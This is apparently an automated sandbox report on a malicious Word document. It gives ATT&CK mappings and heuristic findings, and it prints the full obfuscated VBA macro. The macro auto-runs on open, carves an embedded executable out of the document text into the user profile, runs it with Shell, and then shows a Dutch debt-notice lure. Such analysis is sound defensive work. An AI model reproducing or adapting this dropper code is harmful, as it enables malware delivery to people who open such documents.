Verdict: MALICIOUS
Risk score: 336

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1204.002 Malicious File
- T1140 Deobfuscate or Obfuscate Malicious Code
This Office document contains VBA macros, including an AutoOpen subroutine, which is a common technique for executing malicious code upon opening. The document body presents a lure to enable content, indicating an attempt to bypass security measures. The presence of MSScriptControl and GetObject calls, along with a critical heuristic for potential Shell calls in VBA, strongly suggests the macro is designed to download and execute a secondary payload. The ClamAV detection as 'Doc.Downloader.Generic' further supports this assessment.
Heuristics (14)

- MSScriptControl.ScriptControl — CVE-2015-0097 (high, CVE likely; CVE_2015_0097_SC): MSScriptControl.ScriptControl — CVE-2015-0097
- ClamAV: Doc.Downloader.Generic-6698421-0 (critical; CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
- VBA macros detected (medium, 7 related findings; OLE_VBA_MACROS): Document contains VBA macro code
- Potential Shell call in VBA (critical; OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script: PggurDIUwaqOQd = Shell(tLLAYFDjBgTnlV)
- GetObject call (high; OLE_VBA_GETOBJ): GetObject call. Matched line in script: Set qLNbvsDU = GetObject(, "word.Application")
- VBA p-code auto-exec with execution tokens (high; OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low; OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: Sub AutoOpen()
- Workbook_Open macro (low; OLE_VBA_WBOPEN): Workbook_Open macro. Matched line in script: Sub Workbook_Open()
- Auto_Open macro (low; OLE_VBA_AUTO): Auto_Open macro. Matched line in script: Sub Auto_Open()
- Environ() call (env variable access) (low; OLE_VBA_ENVIRON): Environ() call (env variable access). Matched line in script: kQUZGgYO = Environ("USERPROFILE")
- Legacy WordBasic auto-exec macro marker (medium; OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Macro/content-enable lure (medium; SE_ENABLE_LURE): Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings
- Suspicious extracted artifact (info; EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info; EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URLs:
  - http://office365.com (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4938 bytes |

SHA-256: 6c60472093a5ed190dd8c22e3600a913aec56bed3b6ecf6330c5cf23230a71cf

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 1 eval/decoder/string-building token(s))

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "CommandButton1, 0, 0, MSForms, CommandButton"
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{A3890737-1CCB-4F4B-83EE-967EF65EACEA}{8D02D022-E6D3-4AA1-86D7-D64C5D0F426D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "NewMacros"
Sub Auto_Open()
TYPwacNQZcDS
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
Sub WzvQOl()
Dim VpOlOxJjQ As String
Dim iTdCdt As String
Dim tgGicCTPBiN As String
Dim EgtLLHjztiKnm As String
Dim PXfzakWmCoQUri As Integer
tgGicCTPBiN = "."
EgtLLHjztiKnm = "exe"
iTdCdt = "mQJeAtlU"
VpOlOxJjQ = iTdCdt + tgGicCTPBiN + EgtLLHjztiKnm
PXfzakWmCoQUri = FreeFile()
Open VpOlOxJjQ For Binary As PXfzakWmCoQUri
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub FUXDzGZU()
Word.ActiveDocument.Range.Select
Selection.WholeStory
Selection.Delete Unit:=wdCharacter, Count:=1
Dim wEIdJlqMlg As Word.Document
Set wEIdJlqMlg = ThisDocument
wEIdJlqMlg.Range.InsertParagraphAfter
wEIdJlqMlg.Range.InsertAfter "Dossiers in Schuldbewaking " + vbLf
wEIdJlqMlg.Range.InsertAfter "" + vbLf
wEIdJlqMlg.Range.InsertAfter "Dossier 51123944" + vbLf
wEIdJlqMlg.Range.InsertAfter "Originele hoofdsom: 575,82 EUR" + vbLf
wEIdJlqMlg.Range.InsertAfter "Betaald: 0,00 EUR" + vbLf
wEIdJlqMlg.Range.InsertAfter "Openstaande hoofdsom: 575,82 EUR" + vbLf
wEIdJlqMlg.Range.InsertAfter "Rente (berekend tot 28052014): 326,73 EUR" + vbLf
wEIdJlqMlg.Range.InsertAfter "Kosten: 162,46 EUR" + vbLf
wEIdJlqMlg.Range.InsertAfter "Te betalen (totale balans) 1 065,01 EUR" + vbLf
wEIdJlqMlg.Range.InsertAfter "Lijst transacties Facturen" + vbLf
End Sub
Sub mksPuOUzPMTOHI(IeVrlfwKyQE)
DoEvents
End Sub
Sub xmckXnEjXw(tLLAYFDjBgTnlV As String)
Dim kQUZGgYO As String
Dim PggurDIUwaqOQd As Integer
kQUZGgYO = Environ("USERPROFILE")
ChDrive (kQUZGgYO)
ChDir (kQUZGgYO)
Debug.Print ("After OnTime: " & Now)
PggurDIUwaqOQd = Shell(tLLAYFDjBgTnlV)
FUXDzGZU
End Sub
Sub TYPwacNQZcDS()
Dim iTdCdt As String
Dim VpOlOxJjQ As String
Dim RLzlqp As Byte
Dim xEYGJINauzfnBcN As String
Dim EDohuWciVs As String
Dim NNiMbxJJ As Long
Dim kQUZGgYO As String
Dim XvHXxtzqbSkJMlS As Boolean
Dim EgtLLHjztiKnm As String
Dim UmsoYsz As Paragraph
Dim AmlwrRjeoc As Integer
Dim PggurDIUwaqOQd As Integer
Dim PXfzakWmCoQUri As Integer
EgtLLHjztiKnm = "exe"
EDohuWciVs = "zndYWHf"
tgGicCTPBiN = "."
iTdCdt = "mQJeAtlU"
VpOlOxJjQ = iTdCdt + tgGicCTPBiN + EgtLLHjztiKnm
kQUZGgYO = Environ("USERPROFILE")
ChDrive (kQUZGgYO)
ChDir (kQUZGgYO)
PXfzakWmCoQUri = FreeFile()
WzvQOl
Debug.Print ("After OnTime: " & Now)
Dim VsarVEJgZlU As String
Dim FUEMOGincXzf As String
Dim dJRzAtidsJv As String
Dim gJseKXAlbAcwnEd As String
Dim iyOvWzlmbRR As ScriptControl
Dim kmPyFwQOEHyOEWU As Document
Set iyOvWzlmbRR = UserForm1.ScriptControl1
iyOvWzlmbRR.Language = "VBS" + "cript"
dJRzAtidsJv = "ActiveDocument."
gJseKXAlbAcwnEd = "Paragraphs"
FUEMOGincXzf = dJRzAtidsJv + gJseKXAlbAcwnEd
Set qLNbvsDU = GetObject(, "word.Application")
On Error GoTo IufEQrycWsZ
iyOvWzlmbRR.AddObject "Obj", qLNbvsDU
IufEQrycWsZ:
For Each UmsoYsz In iyOvWzlmbRR.Eval("Obj." & FUEMOGincXzf)
mksPuOUzPMTOHI (UmsoYsz)
xEYGJINauzfnBcN = UmsoYsz.Range.Text
Debug.Print ("After OnTime: " & Now)
If (XvHXxtzqbSkJMlS = True) Then
NNiMbxJJ = 1
Dim JrwifWKWyg As Integer
JrwifWKWyg = 4
While (NNiMbxJJ < Len(xEYGJINauzfnBcN))
RLzlqp = Mid(xEYGJINauzfnBcN, NNiMbxJJ, JrwifWKWyg)
Debug.Print ("After OnTime: " & Now)
Put #PXfzakWmCoQUri, , RLzlqp
NNiMbxJJ = NNiMbxJJ + JrwifWKWyg
Wend
ElseIf (InStr(1, xEYGJINauzfnBcN, EDohuWciVs) > 0 And Len(xEYGJINauzfnBcN) > 0) Then
Dim IoJRbENKJeGC As Boolean
IoJRbENKJeGC = True
XvHXxtzqbSkJMlS = IoJRbENKJeGC
End If
Next
Close #PXfzakWmCoQUri
xmckXnEjXw (VpOlOxJjQ)
End Sub